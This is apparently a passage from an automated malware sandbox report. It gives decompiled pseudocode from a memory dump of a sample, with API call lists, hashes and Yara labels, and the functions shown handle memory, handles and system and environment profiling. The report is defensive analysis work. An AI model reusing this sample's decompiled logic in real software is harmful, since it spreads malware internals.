								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x0008e2c6
0x0008e2d9
0x0008e2e0
0x0008e2e9
0x0008e2f1
0x0008e2f7
0x0008e2fc
0x0008e307
0x0008e30c
0x0008e3a5
0x0008e3a5
0x0008e3ad
0x00000000
0x0008e3b2
0x0008e313
0x0008e316
0x0008e31d
0x0008e32d
0x0008e333
0x0008e343
0x0008e348
0x0008e34d
0x0008e354
0x0008e358
0x0008e35f
0x0008e363
0x0008e367
0x0008e368
0x0008e36b
0x0008e370
0x0008e379
0x0008e385
0x0008e38f
0x0008e394
0x0008e394
0x0008e379
0x0008e39a
0x0008e39b
0x00000000
0x0008e3a4
0x00000000

APIs

Sleep.KERNELBASE(0000000A), ref: 0008E394

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
Opcode Fuzzy Hash: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008A3ED, Relevance: 1.3, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				signed int _v16;
				char _v20;
				void* _t24;
				char _t25;
				signed int _t30;
				intOrPtr* _t45;
				signed int _t46;
				void* _t47;
				void* _t54;

				_t54 = __fp0;
				_t45 = __edx;
				_t46 = 0;
				_t30 = __ecx;
				if( *__edx > 0) {
					do {
						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
						if(_t24 == 0) {
							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
							_v8 = _t25;
							if(_t25 != 0) {
								L6:
								_v16 = _v16 & 0x00000000;
								_v20 = _t25;
								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
								_t47 = _t47 + 0xc;
							} else {
								if(GetLastError() != 0xd) {
									_t25 = _v8;
									goto L6;
								} else {
									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t45);
				}
				return 0;
			}

0x0008a3ed
0x0008a3f6
0x0008a3f8
0x0008a3fa
0x0008a3fe
0x0008a400
0x0008a408
0x0008a40f
0x0008a418
0x0008a41d
0x0008a422
0x0008a446
0x0008a44b
0x0008a451
0x0008a45d
0x0008a462
0x0008a424
0x0008a42d
0x0008a443
0x00000000
0x0008a42f
0x0008a43b
0x0008a440
0x0008a42d
0x0008a422
0x0008a465
0x0008a466
0x0008a400
0x0008a470

APIs

Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782

GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00085D7D, Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00085D7D(void* __eflags) {
				char _v44;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t11;
				WCHAR* _t12;
				WCHAR* _t13;
				WCHAR* _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t27;
				WCHAR* _t28;

				_t7 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
				_t10 =  *0x9e684; // 0xe9f8f0
				_t28 = 2;
				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
				if(_t11 == 0) {
					_t22 =  *0x9e688; // 0xb0000
					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
					 *0x9e6ac = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00089EBB();
						__eflags = _t14;
						if(_t14 == 0) {
							_t28 = 0;
							__eflags = 0;
						} else {
							_t15 =  *0x9e688; // 0xb0000
							lstrcmpiW(_t15 + 0x228, _t14);
							asm("sbb esi, esi");
							_t28 = _t28 + 1;
						}
					}
					_t13 = _t28;
				} else {
					_t19 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t19 + 0x30))(_t11);
					_t13 = 3;
				}
				return _t13;
			}

0x00085d80
0x00085d95
0x00085d9e
0x00085da7
0x00085da9
0x00085db1
0x00085dc1
0x00085dcf
0x00085dd4
0x00085dd9
0x00085ddb
0x00085ddd
0x00085de2
0x00085de4
0x00085dff
0x00085dff
0x00085de6
0x00085de7
0x00085df2
0x00085dfa
0x00085dfc
0x00085dfc
0x00085de4
0x00085e01
0x00085db3
0x00085db4
0x00085db9
0x00085dbe
0x00085dbe
0x00085e05

APIs

lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0008BA05, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x9e68c; // 0xe9fab8
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E0008B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x9e684; // 0xe9f8f0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}

0x0008ba0a
0x0008ba12
0x0008ba1a
0x0008ba1f
0x0008ba29
0x0008ba32
0x0008ba37
0x0008ba3c
0x0008ba5a
0x0008ba5d
0x0008ba3e
0x0008ba41
0x0008ba43
0x0008ba4b
0x0008ba4b
0x0008ba4e
0x0008ba4e
0x0008ba61
0x0008ba22
0x0008ba22
0x0008ba22

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51

Uniqueness

Uniqueness Score: -1.00%

Function 00085CEC, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0x9e688; // 0xb0000
				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000885EF();
				E00088F78();
				 *0x9e780 = 0;
				 *0x9e784 = 0;
				 *0x9e77c = 0;
				E00085EB6(); // executed
				E0008CF84(_t24);
				_t14 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0x9e688; // 0xb0000
				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E0008B337( &_v44);
				memset( &_v44, 0, 0x27);
				E00085C26( &_v44, __fp0);
				_t21 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}

0x00085cec
0x00085cec
0x00085cef
0x00085cfe
0x00085d03
0x00085d08
0x00085d0f
0x00085d15
0x00085d1b
0x00085d21
0x00085d26
0x00085d2b
0x00085d33
0x00085d3d
0x00085d4b
0x00085d53
0x00085d5f
0x00085d67
0x00085d6c
0x00085d72
0x00085d7c

APIs

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

memset.MSVCRT ref: 00085D5F

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
String ID:
API String ID: 4245722550-0
Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0008861A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E0008C392(_t9);
						}
					} else {
						_t4 = E0008C379(_t9);
					}
					E0008874F(_t9, 0, _t4);
					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
				}
				return _t3;
			}

0x0008861d
0x00088622
0x00088668
0x00088668
0x00088625
0x00088629
0x0008862b
0x0008862e
0x00088634
0x00088642
0x00088646
0x00088646
0x00088636
0x00088637
0x0008863c
0x0008864f
0x00088660
0x00088660
0x00000000

APIs

HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0008A77D, Relevance: 1.3, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E0008A5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E0008A65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x0008a786
0x0008a787
0x0008a78c
0x0008a790
0x0008a79f
0x0008a7a7
0x0008a7b4
0x00000000
0x0008a7b7
0x0008a7ab
0x00000000
0x0008a7ab
0x00000000

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2

Uniqueness

Uniqueness Score: -1.00%

Function 000898A6, Relevance: 1.3, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000898A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E0008984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}

0x000898aa
0x000898bc
0x000898ca
0x000898d7
0x000898da
0x000898e1
0x000898e1
0x00000000
0x000898e6
0x00000000

APIs

CloseHandle.KERNELBASE(?), ref: 000898CA

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790

Uniqueness

Uniqueness Score: -1.00%

Function 0008B337, Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008B337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x9e684; // 0xe9f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x9e684; // 0xe9f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}

0x0008b337
0x0008b33f
0x0008b344
0x0008b34a
0x0008b34e
0x0008b350
0x0008b355
0x0008b35e
0x0008b362
0x0008b362
0x0008b36a
0x00000000
0x0008b36d
0x0008b371

APIs

CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0008D01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0008D01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x9e69c; // 0x10000000
				_t81 = E00088604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x9e684; // 0xe9f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E0008BA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E0008BB8D( *_t88) == 0) {
					_t90 = E0008BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0x9e68c; // 0xe9fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0x9e694; // 0xe9fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E0008B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E0008B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0xe9f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0xe9f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0xe9f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0xe9f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0xe9f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0xe9f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0xe9f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}

0x0008d01f
0x0008d029
0x0008d035
0x0008d03a
0x0008d03f
0x0008d3ff
0x0008d3ff
0x0008d04c
0x0008d052
0x0008d057
0x0008d05d
0x0008d06d
0x0008d079
0x0008d079
0x0008d082
0x0008d088
0x0008d08a
0x0008d093
0x0008d093
0x0008d09f
0x0008d0a3
0x0008d0a8
0x0008d0ae
0x0008d0b7
0x0008d0c5
0x0008d0cc
0x0008d0d1
0x0008d0d1
0x0008d0d2
0x0008d0b9
0x0008d0b9
0x0008d0b9
0x0008d0d8
0x0008d0e3
0x0008d0f1
0x0008d0f7
0x0008d0fb
0x0008d101
0x0008d108
0x0008d10f
0x0008d113
0x0008d11a
0x0008d11b
0x0008d128
0x0008d12a
0x0008d12f
0x0008d13c
0x0008d13e
0x0008d13e
0x0008d140
0x0008d14a
0x0008d156
0x0008d166
0x0008d16c
0x0008d172
0x0008d174
0x0008d185
0x0008d18b
0x0008d191
0x0008d196
0x0008d19c
0x0008d1a2
0x0008d1a7
0x0008d1ac
0x0008d1ac
0x0008d1b2
0x0008d1b2
0x0008d1bb
0x0008d1c7
0x0008d1cf
0x0008d1d3
0x0008d1d3
0x0008d1cf
0x0008d1d7
0x0008d1dd
0x0008d1e3
0x0008d1ea
0x0008d1fb
0x0008d201
0x0008d209
0x0008d210
0x0008d223
0x0008d229
0x0008d22e
0x0008d231
0x0008d234
0x0008d23a
0x0008d240
0x0008d242
0x0008d248
0x0008d251
0x0008d254
0x0008d254
0x0008d257
0x0008d25f
0x0008d26a
0x0008d270
0x0008d261
0x0008d263
0x0008d263
0x0008d279
0x0008d279
0x0008d27f
0x0008d287
0x0008d292
0x0008d297
0x0008d29d
0x0008d29f
0x0008d2ac
0x0008d2ad
0x0008d2ae
0x0008d2b9
0x0008d2bb
0x0008d2c2
0x0008d2c2
0x0008d2cc
0x0008d2d1
0x0008d2d6
0x0008d2d6
0x0008d2dc
0x0008d2e3
0x0008d2e4
0x0008d2f1
0x0008d304
0x0008d309
0x0008d30e
0x0008d317
0x0008d317
0x0008d31d
0x0008d322
0x0008d328
0x0008d32e
0x0008d333
0x0008d33c
0x0008d33e
0x0008d345
0x0008d345
0x0008d34b
0x0008d353
0x0008d358
0x0008d359
0x0008d35e
0x0008d367
0x0008d369
0x0008d374
0x0008d374
0x0008d37d
0x0008d385
0x0008d38c
0x0008d391
0x0008d3a0
0x0008d3b8
0x0008d3bf
0x0008d3cd
0x0008d3df
0x0008d3e6
0x0008d3f3
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetCurrentProcessId.KERNEL32 ref: 0008D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
GetCurrentProcess.KERNEL32 ref: 0008D09F
GetLastError.KERNEL32 ref: 0008D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
GetLastError.KERNEL32 ref: 0008D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
GetCurrentProcess.KERNEL32 ref: 0008D20E
memset.MSVCRT ref: 0008D229
GetVersionExA.KERNEL32(00000000), ref: 0008D234
GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
GetSystemInfo.KERNEL32(?), ref: 0008D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287

Strings

USERPROFILE, xrefs: 0008D2E4, 0008D312
%s\%s, xrefs: 0008D2F9
TEMP, xrefs: 0008D328, 0008D333, 0008D344
TEMP, xrefs: 0008D2F3
SystemDrive, xrefs: 0008D353, 0008D35E, 0008D373

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
